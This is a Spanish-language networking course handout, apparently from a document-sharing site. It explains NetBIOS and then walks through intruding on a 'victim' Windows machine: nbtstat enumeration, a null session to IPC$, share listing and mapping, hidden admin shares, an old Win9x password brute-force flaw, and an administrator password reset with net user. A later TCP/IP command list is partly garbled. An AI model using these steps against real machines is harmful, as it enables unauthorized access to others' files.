Intrusion Es

DIAGNOSTICO Y MANTENIMIENTO DE PC (REDES)
Prof. Carlos Arroyo UNIDAD 14 Pgina 1 de 9

NETBIOS

NETBIOS (Network Basic Output/Input System que traducido, Sistema Bsico de Red
Entrada/Salida) es el protocolo que se encarga de compartir los archivos y las
impresoras entre varios ordenadores. Tal vez habrs odo mencionar alguna vez el
NETBEUI (NetBIOS Extended User Interface o Interfaz de Usuario Extendido), pues
bien, es lo mismo pero NETBIOS lo desarrollaron IBM y Sytek, y NETBEUI lo desarrollo
Microsoft, tratando de optimizar el NETBIOS para Windows.

Es habitual or hablar simplemente del "139" este es el puerto por el que funciona este
protocolo, el 137 y el 138 tambin forman parte de este protocolo:

NetBIOS-ns 137 TCP / UDP NetBIOS Name Service

NetBIOS-dgm 138 TCP / UDP NetBIOS Datagram Service

NetBIOS-ssn 139 TCP / UDP NetBIOS Session Service

Para poder comprobar este ataque con xito debemos tener instalado el protocolo en
la PC, para ello, si tenemos Windows 95 / 98 /Me debemos ir a:

INICIO \ CONFIGURACION \ PANEL DE CONTROL \ RED e instalar el cliente para redes
Microsoft, el protocolo TCP/IP y activar "Compartir archivos e impresoras", si tenemos
el Windows NT4 / 2000 / XP debes hacer lo mismo pero, en estos sistemas se hace en
cada conexin a Internet por separado (slo necesitamos activarlo en aquella que
vayamos a utilizar para el ataque).

ENTRANDO POR NETBIOS

Lo que se explica a continuacin se puede utilizar desde un Windows para atacar otro
Windows, aunque el ataque est pensado para NT sera muy similar si quisiramos
atacar un Windows 9x, pero no voy a entrar en muchos detalles, porque debido a que
hoy en da existen maneras ms fciles y rpidas de hacerlo, esta seccin la hemos
puesto slo por cuestiones didcticas del tema intrusiones.

Una vez elegida la mquina a la que quieres entrar solo necesitamos el MS-DOS, o el
Smbolo de Sistema, que para el caso es lo mismo, pues bien abrimos una ventana y
escribimos:

a) nbtstat -A 192.168.0.1
(Si lo que conocemos es la IP de la victima)

b) nbtstat -a nombre_del_PC
(Si conocemos slo su nombre)

Pueden ocurrir varias cosas, si recibimos:


C:\WINDOWS>nbtstat -A 192.168.0.1
Host not found.

Pues queda claro que "not found", o no est conectado, o no comparte archivos, o no
existe (revisar si no hay error de sintaxis)
Si la respuesta es:

NetBIOS Remote Machine Name Table

Name Type Status

--------------------------------------------------------------

NAME <00> UNIQUE Registered

WORKGROUP <00> GROUP Registered


MAC Address = 00-00-00-00-00-00

Pues aunque parezca mejor, para el caso nos da igual, porque aunque si lo tiene
instalado, no comparte nada.
En el caso que recibamos esta respuesta:

NetBIOS Remote Machine Name Table

Name Type Status
----------------------------------------------------------------


WORKGROUP <00> GROUP Registered



WORKGROUP <1E> GROUP Registered

MAC Address = 00-00-00-00-00-00

En este caso son buenas noticias. La diferencia importante es el <20> que corresponde
al "File Server Service" (Servicio servidor de archivos), solo las PC que tienen el <20>
tienen archivos compartidos y accesibles.

El IPC$ (Inter-Process Communication) es un recurso compartido oculto estndar en
una mquina NT, y es utilizado por el servidor para establecer comunicacin con otros
equipos.

Conectndose al IPC$ un intruso puede establecer una comunicacin valida con el
servidor NT. Conectndose como null, el intruso puede establecer dicha comunicacin
sin necesidad de introducir user:password.

Para ello se utiliza el siguiente comando:

c:\>net use \\[ip_de_la_vctima]\ipc$ "" /user:""
The command completed successfully.

Podemos verificar qu comparte esa computadora sin necesidad de entrar, para ello
utiliza el comando NET

C:\>net view \\192.168.0.1

Recibiremos la siguiente respuesta:

Shared resources at 192.168.0.1

Share name Type Used as Comment
-------------------------------------------------------------
NETLOGON Disk Logon server share

Test Disk


Adems es posible que ocurra esto:

C:\>net view \\192.168.0.1

System error 5 has occurred.

Entonces primero tenemos que establecer una "null session", es decir, anularemos la
sesin:

C:\>net use \\192.168.0.1\ipc$ "" /user:""


Ahora escribiremos lo siguiente:

C:\>net view \\192.168.0.1

Esta vez la el sistema renuente ceder, para conectar a la carpeta compartida:


Si escribimos net use ahora, recibiremos algo as:

Status Local Remote Network

---------------------------------------------------------------------

OK X: \\123.123.123.123\test Microsoft

OK \\123.123.123.123\test Microsoft


Para acceder directamente a la PC slo debemos:

1 Escribir en el Explorer: \\192.168.0.1

2 O en su defecto: INICIO EJECUTAR y poner lo mismo \\192.168.0.1

3 Lo mismo sera: Botn derecho en Mis Sitios de Red Buscar Equipos... y
escribimos la IP: 192.168.0.1

4 En una ventana de smbolo de sistema escribir:

C:\>net use x: \\192.168.0.1\test

Y despus:

C:\>dir x:

Este ataque solo funcionar si la carpeta compartida no tiene password. (Para ellos
existen otras estratagemas).

Recuerda que un intruso no est limitado a los recursos compartidos que aparecen con
el net view.

Un intruso que conozca NT sabe que existen otros recursos compartidos ocultos para
uso administrativo. Por defecto NT crea el IPC$ y otro por cada particin (por ejemplo
una mquina que tiene C, D, y E tendr sus correspondientes C$, D$, y E$).

Tambin hay un ADMIN$ que pertenece a la ruta donde fue instalado el NT (por
ejemplo si instalaste NT en C:\winnt, entonces ADMIN$ apunta exactamente a esa
parte del disco).

CRAKEANDO LOS PASSWORDS

El 24 de agosto del 2000 NS-FOCUS - http://www.nsfocus.com/ - haca pblica una
vulnerabilidad en la implementacin del protocolo NETBIOS en todos los sistemas
operativos corriendo el kernel 9x de la empresa Microsoft, incluyendo el nuevo
Windows ME y las versiones ms avanzadas de Windows 98.

La vulnerabilidad en s misma no es ms que un error de implementacin a la hora de
establecer la longitud del password para validarlo ante una peticin NETBIOS.

Los sistemas vulnerables obtienen el nmero de bytes a comparar para el password
del paquete que reciben del cliente.

Un usuario malicioso podra establecer la longitud del password a 1 byte intentar un
ataque por fuerza bruta contra el password compartido. El nmero de intentos que
debera realizar sera tan slo de 256 (2 elevado a 8).

El exploit que proporciona NS-FOCUS en su WEB modifica el cliente de samba en su
versin 2.0.6 para atacar los recursos compartidos de un sistema vulnerable.

Veremos los pasos a seguir en caso de que perdimos o no conocemos la contrasea del
administrador:

1 Entramos a la consola de Comandos ( + R) cmd
2 Dentro de ella escribimos los siguientes comandos:
cd\
Esto nos servir para salir del prompt existente.
3 Luego entraremos a un prompt de sistema, para ello escribiremos:

cd Windows
Seguidamente de:

cd system32

4 Con ello nos habr quedado el prompt de la siguiente manera:
C:\Windows\Systems32>

5 Utilizaremos el comando net user, para poder romper la contrasea del
usuario:

net user administrador *
El sistema le pedir un password.
6 Es cuando debemos dar ENTER, nos pide confirmar, damos ENTER de nuevo.


COMANDOS TCP/IP

TCP/IP incluye dos grupos de comandos utilizados para suministrar servicios de red:

Los comandos remotos BERKELEY
Los comandos DARPA

Los comandos remotos BERKELEY, que fueron desarrollados en la Universidad Berkeley
(California), incluyen rdenes para comunicaciones entre sistemas operativos UNIX,
como copia remota de archivos, conexin remota, ejecucin de shell remoto, etc.
Permiten utilizar recursos con otros hosts, pudiendo tratar distintas redes como si
fueran una sola.
En la versin 4 para UNIX Sistema V, se pueden distinguir los siguientes comandos ms
comunes:
RCP Realiza una copia de archivos al mismo o a otro servidor
RLOGINGL-RLOGINVT Se utiliza para hacer una conexin al mismo o a otro servidor
REXEC-RSH Permite ejecutar comandos del sistema operativo en
El mismo o en otro servidor.
Los comandos DARPA incluyen facilidades para emulacin de terminales, transferencia
de archivos, correo y obtencin de informacin sobre usuarios. Pueden ser utilizadas
para comunicacin con computadoras que ejecutan distintos sistemas operativos.
En la versin 2.05 para DOS, dependiendo de las funciones que realizan, se pueden
distinguir los siguientes grupos de comandos:

Kernel PC/TCP y herramientas asociadas
Se utilizan para cargar el ncleo TCP/IP en la memoria del computador.
BOOTP
Asigna la direccin IP de la estacin de trabajo
INET
Descarga el ncleo PC/TCP de la memoria y/o realiza estadsticas de red
KERNEL
Carga el ncleo TCP/IP en la memoria y lo deja residente

Configuraci6n de la red
Permiten configurar TCP/IP con determinados parmetros.
IFCONFIG
Configura el hardware para TCP/IP
IPCONFIG
Configura el software TCP/IP y la direcci6n IP
IPCONFIG /ALL
Muestra todas las conexiones existentes, tanto la nuestras como las intrusas.

Transferencia de archivos
Se utilizan para transferir archivos entre distintos computadores. Son la utilizadas para
subir archivos y data a los servidores de internet que alojan las pginas web.

Si dentro del comando ftp, escribimos help, nos sale todos los sub-comandos
existentes dentro de l, a decir:

DDAT'ES
Muestra las fechas y horas guardadas en un archivo creado con el comando TAR.
FTP
Transfiere archivos entre unidades de trabajo y servidor.
FRPSRV
Convierte una estacin de trabajo en un servidor
FTP
PASSWD
Se utiliza para poner contraseas en las estaciones de trabajo a los usuarios para poder
utilizar el comando
FTPSRV
RMT
Permite realizar copia de archivos en una unidad de cinta
TAR
Realiza una copia de archivos creando un nico archivo de
BACKUP
TFTP
Transfiere archivos entre una estacin de trabajo un servidor o a otra estacin de
trabajo.

Impresin
Permiten el control de la impresin en las impresoras conectadas al servidor.
DOPREDIR
Imprime un trabajo de impresin que an no ha sido impreso.
IPRINT
Enva texto o un archivo a un servidor de impresoras de imagen.
LPQ
Indica la cola de impresin indicada.

LPR
Enva un texto o un archivo a una impresora local o de red.
LPRM
Elimina trabajos pendientes de la cola de impresin
ONPREDIR
Realiza tareas de configuracin para el comando PREDIR
PREDIR
Carga o descarga el programa que permite la impresin remota y lo deja residente.
PRINIT
Se usa con los comandos PREDIR y ONPREDIR
PRSTART
Indica a la estacin de trabajo remota que imprima un archivo usando la configuracin
por defecto.

Conexin a servidores
Permiten la conexin de los computadores a servidores de nuestra red.
SUPDUP
Permite conectarse a otro servidor de la red.
TELNET-TN
Es el mtodo normal de conectarse a un servidor de la red.

Informacin de usuarios
Muestran informacin sobre los usuarios conectados a la red.
FINGER
Muestra informacin sobre un usuario conectado a otra estacin de trabajo
NICNAME
Muestra informacin sobre un usuario o sobre un servidor solicitada al centro de
informacin de redes.
WHOIS
Muestra informacin sobre un usuario registrado que est conectado a otra estacin
de trabajo.

Envo y recepcin de correo
Estos comandos permiten el envo y/o recepcin de correo entre los usuarios de la red.

MAIL
Permite enviar y recibir correo en la red
PCMAIL
Permite leer correo. Se ha de usar con el comando VMAIL
POP2 - POP3
Se utiliza para leer correo. Se han de usar con VMAIL Y SMTP
SMTP
Se utiliza para enviar correo en la red
SMTPSRV
Permite leer el correo recibido
VMAIL Es un comando que muestra una pantalla preparada para leer el correo
recibido. Se utiliza en conjuncin con los comandos PCMAIL, POP2 o POP3.


Chequeo de Red
Permiten chequear la red cuando aparecen problemas de comunicaciones.
HOST
Indica el nombre y la direccin IP de una estacin de trabajo determinada
PING
Enva una Llamada a una estacin de trabajo e informa si se puede establecer conexin
o no con ella.
SETCLOCK
Muestra la fecha y la hora que tiene la red

COMO FUNCIONA TCP/IP

Una red TCP/IP transfiere datos mediante el ensamblaje de bloques de datos en
paquetes, cada paquete comienza con una cabecera que contiene informacin de
control; tal como la direccin del destino, seguido de los datos. Cuando se enva un
archivo por la red TCP/IP, su contenido se enva utilizando una serie de paquetes
diferentes. El Internet Protocol (IP), un protocolo de la capa de red, permite a las
aplicaciones ejecutarse transparentemente sobre redes interconectadas. Cuando se
utiliza IP, no es necesario conocer que hardware se utiliza, por tanto sta corre en una
red de rea local.
El Transmissin Control Protocol (TCP); un protocolo de la capa de transporte, asegura
que los datos sean entregados, que lo que se recibe, sea lo que se pretenda enviar y
que los paquetes que sean recibidos en el orden en que fueron enviados. TCP
terminar una conexin si ocurre un error que haga la transmisin fiable imposible.

ADMINISTRACION TCP/IP
TCP/IP es una de las redes ms comunes utilizadas para conectar computadoras con
sistema UNIX. Las utilidades de red TCP/IP forman parte de la versin 4, muchas
facilidades de red como un sistema UUCP, el sistema de correo, RFS y NFS, pueden
utilizar una red TCP/CP para comunicarse con otras mquinas.
Para que la red TCP/IP est activa y funcionando ser necesario:

Obtener una direccin Internet. Instalar las utilidades Internet en el sistema
Configurar la red para TCP/IP
Configurar los guiones de arranque TCP/IP
Identificar otras mquinas ante el sistema
Configurar la base de datos del o y ente de STREAMS
Comenzar a ejecutar TCP/IP

Para ms informacin, entrar al archivo de Comandos de Redes, all podr bucear un
poco en este under y tal vez adentrarse en el mundo del hackin e Ing inversa.

* Material obtenido desde diferentes fuentes de Internet al solo efecto de divulgacin didctica entre los
alumnos de ICAFI.
La Empresa y el Autor NO se hacen responsables por el uso indebido del presente material.

Intrusion Es

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Intrusion Es

Uploaded by

Copyright:

Available Formats

DIAGNOSTICO Y MANTENIMIENTO DE PC (REDES)

Prof. Carlos Arroyo UNIDAD 14 Pgina 1 de 9

You might also like